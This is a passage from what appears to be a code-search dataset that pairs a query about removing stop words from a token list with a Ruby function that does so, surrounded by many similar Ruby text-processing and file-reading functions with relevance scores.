"def tokenize(in_name) \n\t\tmulti_line = false\n\t\t@in_file = File.new(in_name, \"r\");\n\t\tout_name = in_name.gsub /.jack$/, \"Tgen.xml\"\n\t\t@out_file = File.new(out_name,\"w\")\n\t\t@out_file.puts \"<tokens>\"\t\t\n\t\tfor i in @in_file #none of these regexes are readable or debugable, never again\n\t\t\ti.gsub! %r!/\\*.*\\*/!, '' #incase a multiline format is only used for a single line after code on same line\n\t\t\tif multi_line\n\t\t\t\t#p \"de #{i}\"\n\t\t\t\tnext unless i.match %r!\\*/!\n\t\t\t\ti.gsub! %r!.*\\*/!, ''\n\t\t\t\tmulti_line = false\n\t\t\tend\n\t\t\t\n\t\t\tif i.match %r!/\\*!\n\t\t\t\t#p \"re #{i}\"\n\t\t\t\ti.gsub! %r!/\\*.*!, ''\n\t\t\t\tmulti_line = true\n\t\t\tend\n\t\t\t\n\t\t\t# hahahahaha %r!! makes finding comments easier because it looks neater and is eaiser to read\n\t\t\ti.gsub! %r!//.*!, ''\n\t\t\ti.gsub! /(\\{|\\}|\\(|\\)|\\[|\\]|\\.|,|;|\\+|-|\\*|\\/|&|\\||<|>|=|~)/, ' \\1 '\n\t\t\t#p i\n\t\t\ti.strip! #ba chica wa wa\n\t\t\ti.scan /\\S+/ do |j|\n\t\t\t\ttype = token_type j\n\t\t\t\tj.gsub! /&/, '&'\n\t\t\t\tj.gsub! /\"/, ''\n\t\t\t\tj.gsub! />/, '>'\n\t\t\t\tj.gsub! /</, '<'\n\t\t\t\twrite_toke type, j\n\t\t\tend\n\t\tend\n\n\t\t@out_file.puts \"</tokens>\"\t\t\n\t\t#SHould always close even if it is done at program's terminations\n\t\t@in_file.close() \n\t\t@out_file.close()\n\tend",
"def wordlist\n # Split defaults to splitting on white space\n File.read(File.expand_path('../data/subdomains.txt', __FILE__)).split\n end",
"def get_stopword_list\n list = []\n \n begin\n File.open(\"stopwords.txt\", \"r\") do |file|\n file.each_line { |line| list.push( line.chomp ) }\n end\n rescue\n puts \"The file 'stopwords.txt' was not found.\"\n exit\n end\n\n return list\nend",
"def prepare_words(filename)\n @words = []\n File.readlines(filename).each do |line|\n line.split.each {|word| @words << word}\n end\n end",
"def index_file(file, pages_dir, stopwords, file_data)\n # Removing the dir from the file name\n # begin\n actual_name = file.gsub(pages_dir, \"\")\n # rescue NoMethodError\n# actual_name = badpage.html\n \n\n # Resetting the file path\n file_path = \"\"\n file_path = File.expand_path(\".\") + \"/\" + file\n\n print \"Parsing HTML document: \" + actual_name + \" \\n\"\n\n # Finding all the tokens in the file\n tokens = find_tokens(file_path)\n\n # Getting the page title, word count, and page url\n page_title = get_title(file_path)\n word_count = tokens.length\n page_url = file_data[actual_name]\n\n # Updating the docindex hash\n $docindex[file.gsub(pages_dir, \"\")] = [word_count, page_title, page_url]\n\n # Removing the stop words and getting the stem words in the file\n tokens = remove_stop_tokens(tokens, stopwords)\n tokens = stem_tokens(tokens)\n\n # Creating the invindex hash table\n for token in tokens\n begin\n if $invindex.member?(token)\n if $invindex[token].member?(actual_name)\n $invindex[token][actual_name] += 1\n else\n $invindex[token][actual_name] = 1\n end\n else\n $invindex[token] = {actual_name => 1}\n end\n # end\n# rescue NoMethodError\n # puts \"NoMethodError\"\n end\n #puts file_name\n # title = nil\n end\n #end\nend",
"def page_content(title)\n File.read(\"pages/words.txt\")\nrescue Errno::ENOENT\n return nil\nend",
"def get_tokens(lines)\n tokens = []\n chunk = \"\"\n\n lines.each do |line|\n case line\n when /^[#\\+\\-]+.*$/ # Headers\n unless chunk == \"\"\n tokens += [chunk.strip]\n chunk = \"\"\n end\n\n tokens += [line.strip]\n when /^\\s*$/ # Ends or Starts of paragraphs\n unless chunk == \"\"\n tokens += [chunk.strip]\n chunk = \"\"\n end\n else #Paragraphs\n chunk += line.strip + \" \"\n end\n end\n\n tokens += [chunk.strip] unless chunk == \"\"\n tokens\nend",
"def ReadFromFile()\n wordArray = Array.new\n File.open(\"mastermindWordList.txt\", \"r\") do |file| # Uncomment this to have a larger list (466000+ words)\n # Note: Only use if in original repository that contains words.txt\n # File.open(\"mastermindWordList.txt\", \"r\") do |file| # Comment this if previous line is uncommented\n file.each_line do |word|\n if CheckValidWord(word) == true\n wordArray.push(word.chomp.downcase)\n end\n end\n end\n return wordArray\nend",
"def parse_kramdown(file)\n ::Kramdown::Document.new File.readlines(file).join, :input => 'QuickStartParser' \n end",
"def words\n @content.split\n end",
"def words\n @content.split\n end",
"def list\n\t\tfiles.map! { |filename|\n\t\t\t{:title => file_to_pagename(filename), :link => filename.chomp(\".md\")}\n\t\t}\n\tend",
"def list\n\t\tfiles.map! { |filename|\n\t\t\t{:title => file_to_pagename(filename), :link => filename.chomp(\".md\")}\n\t\t}\n\tend",
"def get_spelling_words(file)\n lines = IO.readlines(file).map(&:chomp)\n review_word = false\n challenge_word = false\n words = []\n lines.each do |line|\n if md=line.match(/\\A(\\d+)\\.\\s+(\\w+)\\Z/)\n (num, word) = md.captures\n words << SpellingWord.new(num, word, review_word, challenge_word)\n elsif line.match(/\\AReview Words/)\n review_word = true\n challenge_word = false\n elsif line.match(/\\AChallenge Words/)\n challenge_word = true\n review_word = false\n end\n end\n words\nend",
"def loadLocalHtml \n details = []\n Dir.glob('./htmls/*') do |file|\n tableTr = getTableFromLocalHtml(file)\n puts file\n detail = getTableCells(tableTr, File.basename(file).sub(\".html\",\"\"))\n details += detail\n end\n generateCSV(details)\nend",
"def load_list filename\n\tlist = []\n\tbegin\n\t\topen filename do |f|\n\t\t\tuntil (line = f.gets).nil?\n\t\t\t\tnext if line.strip.empty?\n\t\t\t\tlist << line.strip\n\t\t\tend\n\t\tend\n\trescue Errno::ENOENT\n\tend\n\tlist\nend",
"def get_list_file(url)\n\t\tdownload_html_file(url)\n\t\tdoc = Nokogiri::HTML(File.new(@tmp_html))\n\n\t\tlist = []\n\t\t# Parsing each link to find the relevant one\n\t\tdoc.css('a[@href!=\"../\"]').each do |link|\n\t\t\tlist << {\n\t\t\t\t'name' => link.text,\n\t\t\t\t'url' => link['href']\n\t\t\t}\n\t\tend\n\t\treturn list\n\tend",
"def word_count_a_file(file_path)\n File.read(file_path).split(' ').length\n # had to create the file, text taken from https://www.lipsum.com/feed/html\nend",
"def searchable_content(file)\n content = File.read file\n content = CommonMarker.render_html content\n content.remove(/<\\/?[^>]*>/).gsub(\"\\n\", \" \")\n end",
"def generate_words\n ret = []\n\n File.open('enable.txt').each do |line|\n new_line = line\n # We don't care for the new line character in the game of hangman.\n new_line = new_line.delete(\"\\n\")\n ret << new_line\n end\n\n return ret\nend",
"def html(name)\n File.open(File.join(File.dirname(__FILE__), \"fixtures\", \"htmls\", \"#{name}\")).read\n end",
"def get_file_contents(file_path)\n input_file = File.open(file_path, 'r')\n input_file_contents = input_file.read\n input_file.close\n input_file_contents.split(\"\\n\")\n end",
"def list\n file_correct?(@file_path)\n file = File.open(@file_path)\n file.map { |row| row.split(' ') }\n end",
"def read_words(dictionary)\n unless FileTest.file?(dictionary)\n p \"Provided #{dictionary} is not a filepath or such file doesn't exist.\"\n return []\n end\n\n words = []\n IO.foreach(dictionary) { |line| words << line.strip }\n words\n end",
"def get_content(file_path)\n puts \"getting markdown for: #{file_path}.md\\n\\n\"\n file = File.open(\"data/pages/#{file_path}.md\", \"r\")\n return file.read\nend",
"def tokens\n @tokens ||= texts.map do |value|\n GoogleTranslateDiff::Tokenizer.tokenize(value)\n end\n end",
"def next_page\n @page_content = []\n pagefile = File.open(@pagefilename, \"r\")\n while (l = pagefile.gets)\n @page_content << l\n end\n \n @nextpagenum += 1\n @pagefilename = @pagefile_prefix + @nextpagenum.to_s + \".txt\"\n \n return @page_content \n end",
"def add_words_from_text_file(file_path)\n words = []\n\n File.open(file_path, 'r') do |file|\n file.each do |line|\n words.push(line.chomp)\n end\n end\n\n add_words(words)\n end",
"def parse_file(f)\n\tentities = []\n\twhile (e = parse_entity(f))\n\t\tentities.push(e)\n\tend\n\treturn entities\nend",
"def analyse(file_path)\n fixed = 0\n words = []\n File.open(file_path, \"r:iso-8859-1\") do |f|\n words = f.readlines(sep=\" \")\n words.dup.each_with_index do |word, i|\n word.delete!(\" \")\n match, dist = @tree.best word.downcase\n if !match.nil? && dist != 0\n fixed+=1\n words[i] = capitalize_if_needed(word, match)\n # puts \"#{word} - #{match}\"\n end\n end\n end\n # print \"file: #{file_path}\\nwords: #{words.size}\\nfixed words:#{((fixed.to_f/(words.size).to_f)*100).round(2)}%\\n\"\n save words, file_path\n end",
"def file_load(file)\n\t\tresult = \"\"\n\t\tFile.open(file.to_s, 'r') do |f|\n\t\t\twhile l = f.gets \n\t\t\t\tresult << l\n\t\t\tend\n\t\tend\n\t\tresult\n\tend",
"def tokenizer(aTextToParse)\n scanner = StringScanner.new(aTextToParse)\n tokens = []\n\n loop do\n scanner.skip(/\\s+/)\n curr_pos = scanner.pos\n word = scanner.scan(/\\S+/)\n break unless word\n\n term_name = Lexicon[word]\n raise StandardError, \"Word '#{word}' not found in lexicon\" if term_name.nil?\n\n pos = Rley::Lexical::Position.new(1, curr_pos + 1)\n tokens << Rley::Lexical::Token.new(word, term_name, pos)\n end\n\n return tokens\nend",
"def extract_all_words(html)\n doc = Nokogiri::HTML(html)\n keywords = []\n doc.css(\"meta[name='keywords']\").each do |node|\n keywords += node['content'].gsub(/\\s+/, \" \").gsub(/[^a-zA-Z\\- ',]/, '').squeeze(\" \").split(\",\")\n end\n text = String.new\n doc.css(\"meta[name='description']\").each do |node|\n text += node['content']\n end\n \n %w(script style link meta).each do |tag|\n doc.css(tag).each { |node| node.remove }\n end\n\n w = []\n doc.traverse do |node|\n if node.text? then\n w << node.content + \" \"\n end\n end\n text += w.join.gsub(/\\s+/, \" \").gsub(/[^a-zA-Z\\- ']/, '').squeeze(\" \")\n words = (text.downcase.split - STOPWORDS)\n \n final = (keywords + words)\n final.map do |w|\n w.stem\n end\n end",
"def words_from_file(text_file)\n File.read(text_file).downcase.gsub(/[^a-z]/, \" \").split\nrescue\n puts \"Please provide the following file: #{text_file}\"\n exit\nend",
"def symbols(file); end",
"def symbols(file); end",
"def read_text(filename); end",
"def parse_html_files\n Find.find(Dir.getwd) do |file|\n if !File.directory? file and File.extname(file) == '.html'\n # exclude and skip if in a bad directory\n # we may be on an html file, but some we just do not want\n current = File.new(file).path\n\n # skip these folders entirely\n if current.match(/(blog|old|draft|archive|font)/i)\n next\n end\n\n # open file, pluck content out by its element(s)\n page = Nokogiri::HTML(open(file));\n\n # grab title\n title = page.css('title').text.to_s;\n title = strip_bad_chars(title)\n\n # for page title, destroy any pipes and MS pipes and return the first match\n title.sub!('Velir | ', '')\n\n # Grab hero title and tagline\n hero = page.css('article.type-centered h2').text\n hero_tagline = page.css('article.type-centered .type-hero').text\n\n # grab the body content\n body = page.css('.outer-wrapper .row .columns').to_html\n body = clean_body(body)\n\n # clean the file path\n path = File.new(file).path\n path.gsub! $base_path, \"/\"\n\n # if we have content, add this as a page to our page array\n if (body.length > 0)\n $count += 1\n puts \"Processing \" + title\n\n # insert into array\n data = {\n 'title' => title,\n 'path' => path,\n 'hero' => hero,\n 'hero_tagline' => hero_tagline,\n 'body' => body,\n }\n\n $pages.push data\n end\n end\n end\n\n write_csv($pages)\n report($count)\nend",
"def read_file(path)\n lines = []\n count = 0\n vocab = Set.new\n File.open(path, \"r:ISO-8859-1\").each do |line|\n line = line.strip\n vocab.merge(parse_vocab(line))\n lines << line\n count += 1\n end\n return lines, vocab\nend",
"def process_content(path)\n case path.extname\n when '.htm', '.md'\n read_split_content(path.to_s, symbolize_keys: true)\n # when '.md'\n # body, data = read_split_content(path.to_s, symbolize_keys: true)\n # [Kramdown::Document.new(body).to_html, data]\n when '.yml'\n [nil, YAML.load(File.read(path.to_s), symbolize_names: true)]\n end\n end",
"def getFileContent(dir, file):Array\n arr = Array.new\n File.open(\"#{dir}/#{file}\", \"r\").each do |line|\n arr.push line\n end\n arr\n end",
"def tokens; end",
"def tokens; end",
"def tokens; end",
"def tokens; end",
"def tokens; end",
"def tokens; end",
"def tokens; end",
"def tokens; end",
"def read_source\n source = []\n File.open($source_file, \"r\") do |file|\n doc = REXML::Document.new(file)\n doc.root.elements.each do |element|\n source << [element.name.strip, element.text.strip]\n end\n end\n return source\nend",
"def get_name_feature_from_file(content)\n parser = Gherkin::Parser.new\n gherkin_document = parser.parse(content)\n gherkin_document[:feature][:name]\nend",
"def parse_tree\n File.open(html_file, 'r') do |file|\n current = nil\n file.each_line do |line|\n line.scan(%r{(<(.*?>.*?)<(\\/.*?)>|<(.*?)>(.*))}).each do |tag|\n if !tag[3].nil? && tag[3].start_with?('/') # ending tag\n current = current.parent\n else\n node = Node.new(tag)\n if @root.nil?\n @root = node\n else\n node.parent = current\n current.childs << node\n end\n @tags << node.tag\n current = node\n current = current.parent if !tag[2].nil? && tag[2].start_with?('/')\n end\n end\n end\n end\n end",
"def load_file_contents(filename)\n File.open(filename).readlines\n end",
"def word_list\n @word_list ||= Set.new File.read(\"dictionary.txt\").split(\"\\n\").map(&:downcase)\n end",
"def getNames()\n\t#open file\n\tf = File.open(\"names.txt\", \"r\")\n\t#initialize namear array\n\tnamear = []\n\tf.each_line do |line|\n\t\t#remove '\"' and line escapes\n\t\tline = line.gsub(/\"/,'').strip\n\t\t#split the line into individual names separating at ','\n\t\tnamear = line.split(',')\n\tend\n\t#close file\n\tf.close\n\t#return array\n\treturn namear\nend",
"def get_tokens\n\t\treturn @tokens\n\tend",
"def tokenize; end",
"def tokenize; end",
"def tokens\n @tokens ||= scanner.tokenize(input)\n end",
"def index(file) \n\n file = File.open(file, \"r\")\n tasks = file.readlines\n file.close\n\n return tasks\n\nend",
"def markup_file_contents(contents); end",
"def get_info(w)\n\trequire 'open-uri'\n\tparagraph = []\n\tcontents = open('http://en.wikipedia.org/wiki/' + w) {|f| \n\t\tf.readlines.each {|x| \n\t\t\tif x =~ /<p>(.*)<\\/p>/\n\t\t\tparagraph.push($1)\n\t\t\tend\n\t}}\n\n\t# If a file name was passed in to be stored somewhere\n\t# Otherwise, Temp.doc will be created and modified\n\tif(ARGV[0] != nil)\n\t\tfile = File.open(ARGV[0], 'a')\n\telse\n\t\tfile = File.open(\"Temp.doc\", 'a')\n\tend\n\n\t# Writes to file what is being searched for\n\tfile.write(w.upcase + \":\\n\")\n\n\t# Uses regular expression to grab first two paragraph\n\tparagraph.each {|p| paragraph(p,file)}\n\t\n\tfile.write(\"\\n\")\n\tfile.close\nend",
"def tokens\n return @tokens\n end",
"def read_search_term_file(file_name)\n file = File.open \"jobs/twitter_resources/#{file_name}.json\"\n data = JSON.load file\n file.close\n return data[\"search_terms\"]\nend",
"def textualed\n list = File.readlines(file_name)\n full_list = list.sort_by { |x| x.downcase }\n while a = full_list.shift\n puts a unless nil? \n end\n end",
"def content_tags(name)\n array = []\n name_li(name).div(:class=>/(mylibrary_item_|searchcontent_result_)tags/).lis.each do |li|\n array << li.span(:class=>\"s3d-search-result-tag\").text\n end\n return array\n end",
"def read()\n a=[]\n f=open(\"words.txt\")\n f.each_line {|line|\n a[a.length]=line.chomp}\n f.close\n return a\nend",
"def tokens\n self.entries\n end",
"def parse_file\n @file ||= File.open(@file_name) unless @file_name.nil?\n @text = @file.readlines\n @file.close unless @file.nil?\n parse_text\n end",
"def read_src name\n IO.readlines('../src/' + name).collect{|c| \"\\t\" + c}\nend",
"def get_keywords( descriptions )\n keywords = []\n descriptions.each do |description|\n page_text = Nokogiri::HTML(description).text\n keywords.concat( page_text.split(/\\W+/) )\n end\n\n return keywords\nend",
"def tokenize ; end",
"def tokenize ; end",
"def read_trees(filename)\n log(\"Reading #{filename}...\")\n File.open(filename, \"r\") do |file|\n file.readlines.collect do |line|\n Tree.from_string(line)\n end\n end\nend",
"def unixWords(inputFile)\n\t\ttext = File.open(inputFile).read\n\t\twords = []\n\t\ttext.each_line do |line|\n\t\t\twords.push(line.gsub(\"\\n\",\"\"))\n\t\tend\n\t\treturn words\n\tend"
] | [
"0.68459404",
"0.6549772",
"0.63205284",
"0.61659604",
"0.6140782",
"0.611115",
"0.593393",
"0.59052026",
"0.5876549",
"0.5870015",
"0.581922",
"0.58115005",
"0.5761115",
"0.57432467",
"0.5727498",
"0.5725638",
"0.56991166",
"0.56788445",
"0.5674697",
"0.5656922",
"0.565593",
"0.5637923",
"0.5632416",
"0.5631721",
"0.55878735",
"0.5579333",
"0.55770874",
"0.55567163",
"0.5546229",
"0.5529622",
"0.55210114",
"0.54902494",
"0.5486387",
"0.5484035",
"0.54530835",
"0.54530835",
"0.54396194",
"0.54396194",
"0.543692",
"0.5431886",
"0.54246944",
"0.5419155",
"0.5417948",
"0.54168373",
"0.5404135",
"0.5402938",
"0.5381219",
"0.53732276",
"0.5364677",
"0.5360528",
"0.5360178",
"0.53417593",
"0.5330434",
"0.5329718",
"0.5311754",
"0.5308575",
"0.5281061",
"0.5280217",
"0.52710533",
"0.5266825",
"0.5266825",
"0.5263649",
"0.5230419",
"0.5224857",
"0.5220612",
"0.52133673",
"0.5197925",
"0.5197925",
"0.5197925",
"0.5197925",
"0.5197925",
"0.5197925",
"0.5197925",
"0.5197925",
"0.5193335",
"0.51914203",
"0.5188258",
"0.5175904",
"0.5166123",
"0.5157334",
"0.51547986",
"0.51458514",
"0.51458514",
"0.51438326",
"0.51387775",
"0.5137",
"0.5133898",
"0.51327807",
"0.51279736",
"0.5127503",
"0.51266503",
"0.51233643",
"0.51217175",
"0.51167816",
"0.51158714",
"0.51135784",
"0.5110327",
"0.5110327",
"0.5106666",
"0.51052725"
] | 0.7772613 | 0 |
function that takes a list of tokens, and a list (or hash) of stop words, and returns a new list with all of the stop words removed | def remove_stop_tokens(tokens, stop_words)
# Looping through the list of tokens and removing all the stop words from the list
for i in tokens
if stop_words.member?(i)
tokens.delete(i)
end
end
return tokens
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def remove_stop_words(list)\n list.select {|word| word unless @stopwords.include? word }\n end",
"def remove_stop_words(list)\n if @filter_stop_words\n list.select {|word| !@stopwords.include?(word) }\n else\n list\n end\n end",
"def removeBlackList words\n\t\tblacklist = ['a','an','the','then','but','therefore','because','I','he',\n\t\t\t\t\t 'she','it','him','her','his','her','its','they','them','their']\n\t\tblacklist.map!{|w| w.upcase}\n\t\tmodified = words.clone\n\t\tmodified.delete_if{|w| blacklist.include?(w.upcase)}\n\t\treturn modified\n\tend",
"def remove_stopwords(ary)\n @filter.filter(ary)\n end",
"def xfrm_remove_stop_words(str)\n stop_words = ['Variant','variant', 'Erhua', 'Counter', 'Has', 'I', 'me', 'a', 'an', 'am', 'are', 'as', 'at', 'be', 'by','how', 'in', 'is', 'it', 'of', 'on', 'or', 'that', 'than', 'the', 'this', 'to', 'was', 'what', 'when', 'where', 'who', 'will', 'with', 'the']\n results = []\n str.gsub!($regexes[:inlined_tags], \"\") ## remove tag blocks\n str.split(' ').each do |sstr|\n # remove non word characters from string\n results << sstr unless stop_words.index(sstr.gsub(/[^a-zA-Z|\\s]/, '').strip)\n end\n return results.flatten.compact.join(' ')\n end",
"def remove_stop_words(question, vectorStopWords)\n vectorStopWords.each do |stopWord|\n if question.match(/\\b#{stopWord}\\b/)\n question.gsub! (/\\b#{stopWord}\\b/), ''\n end\n end\n question\n end",
"def tokenize(s)\nterms = s.gsub(/(\\s|\\d|\\W)+/u,' ').rstrip.strip.downcase.split(' ')\nterms.reject!{|term| @@stop_words.include?(term) || term.length < 3}\nterms\nend",
"def filter_term_list(term_list)\n (term_list.map(&:downcase) - IGNORED_WORDS).reject { |t| t.size < 3 }\n end",
"def remove_stop_words\n f = File.open('/Users/ravil/experimental/exips/stop_words.txt')\n $stack.push(f.read.split(','))\n f.close\n # add single letter words\n $stack[-1] += 'abcdefghijklmnopqrstuvwxyz'.chars # Python's list(string.ascii_lowercase)\n $heap[:stop_words] = $stack.pop\n $heap[:words] = []\n while $stack.length > 0\n if $heap[:stop_words].include? $stack.last\n $stack.pop\n else\n $heap[:words].append $stack.pop # pop it, store it\n end\n end\n $stack += $heap[:words] # Load the words onto the stack\n $heap[:stop_words] = nil; $heap[:words] = nil # Not needed\nend",
"def process_stopwords(txt = self.search_text)\n #Needs to be set so highlighting will work properly (can't match quotes)\n self.highlight_token_array(txt)\n #Now put humpty dumpty back together without the nasty stopwords, sort the tokens by length\n self.search_token_array(txt).join(\" \")\n end",
"def filter phrase\n\t\twords = phrase.reject{ |word| stopwords_list.include? word }\n\t\twords.reject{ |word| invalid_word? word}\n\tend",
"def stop_on *words\n @stop_words = [*words].flatten\n end",
"def array_with_stopwords(txt)\n qa = self.query_wo_exact_phrases(txt).split\n qa.delete(',') #delete works on self (qa here), so won't work chained onto the statement above!\n qa\n end",
"def strip_stopwords!(stopwords, min_length)\n @body = @body.split.delete_if() do |x| \n t = x.downcase.gsub(/[^a-z]/, '')\n t.length < min_length || stopwords.include?(t)\n end.join(' ')\n end",
"def remove_words(text, removes)\n\twords = text.split(\" \")\n\n\twords_to_remove = []\n\n\tremoves.split(\" \").each do |item|\n\t\twords_to_remove << item\n\tend\n\n\treturn_text = \"\"\n\n\twords.each do |word|\n\t\treturn_text += \"#{word} \" unless words_to_remove.include?(word)\n\tend\n\n\treturn return_text\nend",
"def strip_stopwords!(stopwords, min_length)\n #noinspection RubyParenthesesAfterMethodCallInspection\n @body = @body.split.delete_if() do |x|\n t = x.downcase.gsub(/[^a-z]/, '')\n t.length < min_length || stopwords.include?(t)\n end.join(' ')\n end",
"def apply(terms)\n terms.reject{|t| @black_list.include?(t.to_ruby) }\n end",
"def delete_endings(words)\n without_endings = []\n words.each do |word|\n without_endings << delete_ending(word)\n end\n\n without_endings\n end",
"def clean_array( keywords )\n keywords.map!{|keyword| keyword.downcase.strip}\n blacklist = %w{ 000 do we from as other like working web data and 00 to you your our on in the of for ru }\n\n keywords.each do |keyword|\n keywords.delete( keyword ) if keyword.empty?\n end\n\n keywords.each do |keyword|\n keywords.delete( keyword ) if keyword.numeric?\n end\n\n keywords.each do |keyword|\n ('a'..'z').to_a.each do |letter|\n keywords.delete( keyword ) if letter == keyword\n end\n end\n\n keywords.each do |keyword|\n blacklist.each do |badword|\n keywords.delete( keyword ) if keyword == badword\n end\n end\n\n keywords.each do |k|\n if k == \"12\"\n ap 'bingo=======================================' if k.numeric?\n end\n end\n\n return keywords \nend",
"def strip_to_stems\n str = self.sanitize_tags\n terms_a = str.gsub(/[^a-z]+/u, ' ').strip.split(' ')\n terms = terms_a.reject do |term|\n ((term.length < 3 && !SHORT_WORDS.include?(term)) || term.length > 20)\n end\n terms.collect! {|term| term.stem}\n terms = terms.select {|term| term.length > 1}\n terms = terms - STOP_STEMS\n return terms.join(' ')\n end",
"def stopwords\n @stopwords ||= @stopword_generator.to_set\n end",
"def custom_stopwords(stopwords)\n unless stopwords.is_a?(Enumerable)\n if stopwords.strip.empty?\n stopwords = []\n elsif File.exist?(stopwords)\n stopwords = File.read(stopwords).force_encoding(\"utf-8\").split\n else\n return # Do not overwrite the default\n end\n end\n Hasher::STOPWORDS[@language] = Set.new stopwords\n end",
"def all_excluded_words\n (excluded_words + (lazy? ? LAZY_WORDS : [])).map(&:downcase)\n end",
"def del_let_words(current)\n output = []\n (0..(current.length-1)).each do |index|\n test_word = current.clone\n test_word[index] = \"\"\n output << test_word if legal_word?(test_word)\n end\n output\nend",
"def stem_tokens(tokens)\n stem_list = []\n\n # Looping through the list and finding the stem word for each word\n for word in tokens\n word = word[/\\w*/]\n s = word.stem\n stem_list.push(s)\n end\n\n return stem_list\nend",
"def remove_w_words(sentence)\r\n\r\n arr = [] # empty array created\r\n x = sentence.split(\" \")\r\n\r\n i = 0\r\n while i < x.length # iteration starts to check \"w\" in each word\r\n arr << x[i] if x[i][0] != \"w\" # words w/o \"w\" collected\r\n i += 1\r\n end\r\n\r\n arr.join(\" \") # result\r\nend",
"def remove_tags!(*list)\n removed = []\n tags.reject! { |tag| list.include?(tag) ? removed.push(tag) : false }\n removed\n end",
"def without_words_not_contributing_to_letter_set(words, new_word)\n words_that_intersect_with_new_word = []\n words.each do |word|\n if letter_set_from_words(word).intersect?(letter_set_from_words(new_word))\n words_that_intersect_with_new_word << word\n end\n end\n\n words_that_intersect_with_new_word.each do |word|\n if letter_set_from_words(words.reject { |w| w == word } + [new_word]) >= letter_set_from_words(word)\n words.delete(word)\n end\n end\nend",
"def exclusion_words(word_list)\n\t# get a subset of words to exclude based on the unique list\n\tuniq_words = word_list.uniq\n\n\t# check there is more than 1 unique word\n\tif uniq_words.length==1\n\t\texclude = []\n\telse\n\t\tmax_exclude = uniq_words.length-1\n\t\texclude_count = rand(1..max_exclude)\n\t\texclude = uniq_words.sample(exclude_count)\n\tend\n\treturn exclude\nend",
"def get_words(str)\n stopwords = stopwords()\n \n str = str.downcase\n str = strip_parenthesis(str)\n str.strip!\n str.gsub!(\"'\", ' ')\n str.gsub!('\"', ' ')\n str.gsub!('.', ' ')\n str.gsub!(',', ' ')\n str.gsub!(':', ' ')\n str.gsub!('/', ' ')\n str.gsub!('!', ' ')\n str.gsub!('?', ' ')\n str.gsub!(';', ' ')\n str.gsub!('<', ' ')\n str.gsub!('>', ' ')\n str.gsub!('-', ' ')\n str.gsub!('$', ' ')\n str.gsub!(/( )+/, ' ')\n str_arr = str.split(' ')\n out_arr = []\n \n for word in str_arr\n if(word.length > 3 and out_arr.index(word) == nil and stopwords.index(word) == nil)\n out_arr << word\n end\n end\n \n out = out_arr.join(' ')\n \n return out\n end",
"def deletions\n new_words = []\n @words.each do |word|\n @word = word || ''\n new_words += (0..length).map { |i| \"#{@word[0...i]}#{@word[i+1..-1]}\" }\n end\n new_words\n end",
"def stop_words\n # Words taken from Jonathan Feinberg's cue.language (via jasondavies.com), see lib/cue.language/license.txt.\n \"i|me|my|myself|we|us|our|ours|ourselves|you|your|yours|yourself|yourselves|he|him|his|himself|she|her|hers|herself|it|its|itself|they|them|their|theirs|themselves|what|which|who|whom|whose|this|that|these|those|am|is|are|was|were|be|been|being|have|has|had|having|do|does|did|doing|will|would|should|can|could|ought|im|youre|hes|shes|its|were|theyre|ive|youve|weve|theyve|id|youd|hed|shed|wed|theyd|ill|youll|hell|shell|well|theyll|isnt|arent|wasnt|werent|hasnt|havent|hadnt|doesnt|dont|didnt|wont|wouldnt|shant|shouldnt|cant|cannot|couldnt|mustnt|lets|thats|whos|whats|heres|theres|whens|wheres|whys|hows|a|an|the|and|but|if|or|because|as|until|while|of|at|by|for|with|about|against|between|into|through|during|before|after|above|below|to|from|up|upon|down|in|out|on|off|over|under|again|further|then|once|here|there|when|where|why|how|all|any|both|each|few|more|most|other|some|such|no|nor|not|only|own|same|so|than|too|very|say|says|said|shall\"\nend",
"def filter(keywords)\n keywords.delete_if do |key, value|\n include?(key.downcase)\n end\n end",
"def get_stop_word_array\n\t\treturn ['a','about','above','after','again','against','all','am','an','and','any','are',\"aren't\",'as','at','be','because','been','before','being','below','between','both','but','by',\n\t\t\t\t\"can't\",'cannot','could',\"couldn't\",'did',\"didn't\",'do','does',\"doesn't\",'doing',\"don't\",'down','during','each','few','for','from','further','had',\"hadn't\",'has',\"hasn't\",\n\t\t\t\t'have',\"haven't\",'having','he',\"he'd\",\"he'll\",\"he's\",'her','here',\"here's\",'hers','herself','him','himself','his','how',\"how's\",'i',\"i'd\",\"i'll\",\"i'm\",\"i've\",'if','in','into',\n\t\t\t\t'is',\"isn't\",'it',\"it's\",'its','itself',\"let's\",'me','more','most',\"mustn't\",'my','myself','no','nor','not','of','off','on','once','only','or','other','ought','our','ours',\n\t\t\t\t'ourselves','out','over','own','same',\"shan't\",'she',\"she'd\",\"she'll\",\"she's\",'should',\"shouldn't\",'so','some','such','than','that',\"that's\",'the','their','theirs','them',\n\t\t\t\t'themselves','then','there',\"there's\",'these','they',\"they'd\",\"they'll\",\"they're\",\"they've\",'this','those','through','to','too','under','until','up','very','was',\"wasn't\",\n\t\t\t\t'we',\"we'd\",\"we'll\",\"we're\",\"we've\",'were',\"weren't\",'what',\"what's\",'when',\"when's\",'where',\"where's\",'which','while','who',\"who's\",'whom','why',\"why's\",'with',\"won't\",\n\t\t\t\t'would',\"wouldn't\",'you',\"you'd\",\"you'll\",\"you're\",\"you've\",'your','yours','yourself','yourselves','zero']\n\tend",
"def remove_stop_words(song)\n\ttitle = song\n\ttitle.gsub!(/\\b(a|an|and|by|for|from|in|of|on|out|the|to|with)\\b+/, \"\")\n\treturn title\nend",
"def get_word_list\n @word_list = @lines.reject do |line|\n line.length < 5 || line.length > 12\n end\n end",
"def cleanupStopWords(line)\n\t#removes a, an, and, by, for, from, in, of, on, or, out, the, to, with from line\n\t\tline.gsub!(/\\ba+\\b|\\ban+\\b|\\band+\\b|\\bby+\\b|\\bfor+\\b|\\bfrom+\\b|\\bin+\\b|\\bof+\\b|\\bon+\\b|\\bor+\\b|\\bout+\\b|\\bthe+\\b|\\bto+\\b|\\bwith+\\b/, '')\n\treturn line\nend",
"def stopwords\n @stopwords ||= IO.readlines(@stopwords_file).map { |l| l.strip }\n end",
"def words( strict = false )\n splits = split( /\\b/ )\n splits.reject! { |w| !(w =~ /\\w/) } if strict\n splits\n end",
"def stopwords\n @stopwords ||= IO.readlines(@stopwords_file).map { |l| l.strip }\n end",
"def stopwords\n @stopwords ||= IO.readlines(@stopwords_file).map { |l| l.strip }\n end",
"def word_unscrambler(str, words)\n str = str.split('').sort.join('')\n possible = []\n words.map do |word|\n sort_word = word.split('').sort.join('')\n possible << word if word_c == str\n end\n return possible\nend",
